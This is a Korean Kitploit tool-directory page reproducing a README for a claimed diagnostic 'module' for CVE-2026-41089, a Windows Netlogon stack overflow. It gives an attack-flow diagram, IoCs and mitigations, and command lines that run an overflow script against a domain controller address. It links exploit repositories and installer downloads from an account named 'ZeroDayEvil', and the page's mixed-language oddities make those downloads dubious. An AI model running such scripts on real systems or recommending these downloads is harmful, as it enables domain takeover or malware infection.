Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-41089-Netlogon — 🛡️ CVE-2026-41089(Windows Netlogon 스택 버퍼 오버플로 RCE)에 대한 공식 AI 보안 도구 진단 모듈. 기술 분석, 공격 아키텍처, IoC 및 완화 전략을 제공합니다. | Kitploit
도구/GitHubGitHub/zerodayvpn/cve-2026-41089-netlogon
Defensive ToolsIndicator of Compromise (IOC) ManagementVulnerability AnalysisExploitationPenetration TestingThreat IntelligenceLearning & EducationRed Teaming

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
zerodayvpn/cve-2026-41089-netlogon

CVE-2026-41089-Netlogon

🛡️ CVE-2026-41089(Windows Netlogon 스택 버퍼 오버플로 RCE)에 대한 공식 AI 보안 도구 진단 모듈. 기술 분석, 공격 아키텍처, IoC 및 완화 전략을 제공합니다.

저장소 보기웹사이트
1일 전아직 검토되지 않음

🛡️ AI Security Tool Module
CVE-2026-41089: Netlogon Stack Buffer Overflow

AI Security Tool Ecosystem을 위한 공식 보안 검사 모듈


Latest Release Build Status Donations Telegram Channel License

🌐 데모 버전 • 📚 프로젝트 사이트 • 💬 커뮤니티 채팅

사이트 내비게이션: 홈 • 업데이트 • 다운로드 • 모듈

AI Security Tool Banner


🧠 Conceptual Overview

Windows Netlogon 서비스에서 발견된 치명적 취약점 CVE-2026-41089에 대한 상세 기술 분석을 공개합니다. 제 분석에 따르면 이 문제는 스택 버퍼 오버플로(CWE-121)와 관련이 있습니다. 특수하게 조작된 요청을 도메인 컨트롤러(DC)로 전송함으로써, 인증되지 않은 공격자가 메모리 손상을 일으키고 NT AUTHORITY\SYSTEM 수준에서 임의 코드를 실행할 수 있습니다.

🎯 Core Impact Philosophy

"He who controls Netlogon, controls the kingdom."
이 취약점의 악용에는 인증이나 사용자 상호작용이 필요하지 않기 때문에, 이 문제는 기업 인프라에 치명적인 위협이 되며 Active Directory 침해로 이어지는 직접적인 경로를 열어줍니다.

📊 Vulnerability Specifications

🕸 Attack Scenario & Architecture

root@kitploit:~
graph TD
    A[Unauthenticated Attacker] -->|Network Access| B[Locate Domain Controller]
    B -->|Send Crafted Netlogon Packet| C[Trigger Stack Buffer Overflow]
    C -->|Memory Corruption in LSASS| D[Arbitrary Code Execution]
    D --> E[Full Domain Controller Takeover]
    E --> F[Complete Active Directory Compromise]

💡 Key Risks & Impact

  • Domain Takeover: 도메인 관리자 권한의 즉각적인 탈취.
  • Credential Harvesting: NTDS.dit 계정 데이터베이스에 대한 완전한 접근.
  • Lateral Movement: 도메인 내 모든 장치에 대한 방해 없는 접근.
  • Persistence: Golden Ticket 및 숨겨진 계정 생성 가능성.

🛡 Detection & Threat Hunting (IoCs)

🔍 침해 지표:

  • [!] Netlogon 서비스의 비정상 종료 또는 재시작 (lsass.exe 프로세스).
  • [!] lsass.exe에서 의심스러운 자식 프로세스 생성.
  • [!] 도메인 컨트롤러에 대한 비정상적인 RPC 요청 급증.

📈 권장 로그 소스: Windows Security Events (서비스 장애 Event IDs), Sysmon (Process Creation), Microsoft Defender for Identity.

🛠 Mitigation Checklist

  • 🟢 패치 설치: Windows Server DC용 Microsoft 보안 업데이트를 즉시 설치하십시오.
  • 🟢 네트워크 세분화: 방화벽을 통해 신뢰할 수 있는 서브넷에서만 RPC/Netlogon 접근을 허용하십시오.
  • 🟡 EDR 모니터링: lsass.exe 프로세스에 대한 행위 분석을 구성하십시오.

💻 모듈 실행 안내

⚠️ 중요: 이 모듈은 AI Security Tool 플랫폼의 일부로서 안전한 진단만을 위해 개발되었습니다. 공식 저장소에서 승인된 모듈만 사용할 것을 강력히 권장합니다.

1️⃣ AI Security Tool 설치

모듈을 사용하려면 프로그램 코어가 설치되어 있어야 합니다:

소스 코드에서 빌드하는 방법은 AI Security Tool 공식 저장소에서 확인할 수 있습니다.

2️⃣ CLI / 터미널을 통한 검사 실행

root@kitploit:~
# Тест подключения и базовая проверка (короткое имя пользователя)
python3 CVE-2026-41089.py 10.0.50.21 corp.local

Проверка уязвимости к переполнению буфера (длина 130)

python3 CVE-2026-41089.py 10.0.50.21 corp.local -l 130

Безопасная проверка с повышенным таймаутом для медленных сетей

python3 CVE-2026-41089.py 10.0.50.21 corp.local -l 200 -t 10


🔍 보안 검사 모듈 및 PoC 저장소

커뮤니티 구성원이 유지 관리하는 취약점, PoC 스크립트 및 연구 모음:

🔥 Remote Code Execution (RCE) & Network Vulns 4 модуля
  • CVE-2026-41089 — Netlogon Remote Code Execution Exploit @ZeroDayEvil
  • CVE-2026-20805 — Windows Remote Code Execution Proof-of-Concept @ZeroDayEvil
  • CVE-2026-41096 — Critical RCE Vulnerability Scanner Module @ZeroDayEvil
  • CVE-2026-24291 — Network Protocol Remote Code Execution @ZeroDayVPN
🛡️ Privilege Escalation (EoP) & Services 2 модуля
  • CVE-2026-66804 — CrossDevice Service Elevation of Privilege @ZeroDayVPN
  • CVE-2026-50416 — Local Privilege Escalation Writeup & PoC @ZeroDayEvil
📚 Vulnerability Research & Writeups 2 модуля
  • CVE-2026-42978 — Deep Technical Analysis & PoC Research @ZeroDayEvil
  • CVE-2026-83991 — Full WriteUp & Exploitation Demonstration @ZeroDayVPN

⚖️ License & Legal Disclaimer

🚨 Disclaimer

이 모듈과 자료는 승인된 보안 감사 및 연구 목적으로만 제공됩니다.
소유자의 사전 서면 동의 없이 시스템에서 이 모듈을 사용하는 것은 불법입니다. 작성자와 AI Security Tool 개발자는 자료의 부적절한 사용으로 인해 발생할 수 있는 손해에 대해 책임지지 않습니다.

🔄 Contribution & Community

프로젝트 발전에 대한 모든 기여를 환영합니다! 주요 분야:

  1. AI 통합: 새로운 LLM 제공자 연결 및 특화된 에이전트 개발.
  2. Security Tools: 보안 검사 모듈 개발 및 CLI 스캐너 통합.
  3. 최적화: 파서 처리 속도 및 실행 보안 향상.
  4. 문서화: 연구 자료 작성 및 번역.

🔗 Contact & Support

  • 공식 사이트: ZeroDayEvil.com
  • Telegram Admin: @ZeroDayEvil
  • Telegram 채팅: @ZeroDyaTool_chat
  • Telegram 채널: @ZeroDyaTool_channel
  • 후원: PayPal Support
  • Open Collective: ZeroDayEvil

AI Security Tool — Reimagining terminal workflow and automation for cybersecurity professionals.

도구 다운로드
매개변수값비고
CVE IDCVE-2026-41089공식 취약점 식별자
위험 등급Critical (CVSS v3.1: 9.8)████████████████████ 100%
취약점 유형CWE-121Stack-based Buffer Overflow
취약한 구성 요소Windows Netlogon ServiceActive Directory 인증 서비스
공격 벡터Network (네트워크)호스트 접근 없이 원격 실행
필요 권한None (불필요)Unauthenticated RCE
OS / 플랫폼버전아키텍처 / 형식업데이트 날짜상태다운로드
🪟 Windowsv6.3.20x64 Installer (.exe)2026-09-08🟢 Latest.exe 다운로드
🪟 Windowsv6.3.20x64 Portable (.tar.gz)2026-09-08🟢 Latest.tar.gz 다운로드
🍏 macOSv5.3.29Apple Silicon M1/M2/M3 (.dmg)2026-09-05🟢 Stable.dmg 다운로드
🐧 Linuxv5.3.27Universal x64 (.tar.gz)2026-09-01🟢 Stable.tar.gz 다운로드
🤖 Androidv8a 5.3.27ARM64 APK (.apk)2026-09-01🟢 Stable.apk 다운로드